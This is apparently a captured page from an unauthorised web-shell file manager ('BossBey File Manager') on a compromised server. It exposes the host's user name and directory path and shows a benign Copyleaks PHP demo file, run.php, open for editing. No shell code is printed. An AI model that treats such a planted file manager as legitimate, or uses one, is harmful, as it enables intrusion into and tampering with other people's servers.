BossBey File Manager
PHP:
8.2.30
OS:
Linux
User:
imagivibe
Root
/
home
/
imagivibe
/
www
/
app.imagivibe.com
/
vendor
/
copyleaks
/
php-plagiarism-checker
/
demo
📤 Upload
📝 New File
📁 New Folder
Close
Editing: run.php
<?php namespace Demo; // include_once('vendor/copyleaks/php-plagiarism-checker/autoload.php'); include_once('../autoload.php'); include_once('./demo.php'); use Demo\Test; $USER_EMAIL = '<USER_EMAIL>'; // change this with your own copyleaks email. $USER_KEY = '<API_KEY>'; // change this with your own copyleaks API key. $WEBHOOK_URL = '<WEBHOOK_URL>'; //exe https://glacial-refuge-96501.herokuapp.com/10b0z2w1 $test = new Test(); $test->run($USER_EMAIL, $USER_KEY, $WEBHOOK_URL);
Save
Cancel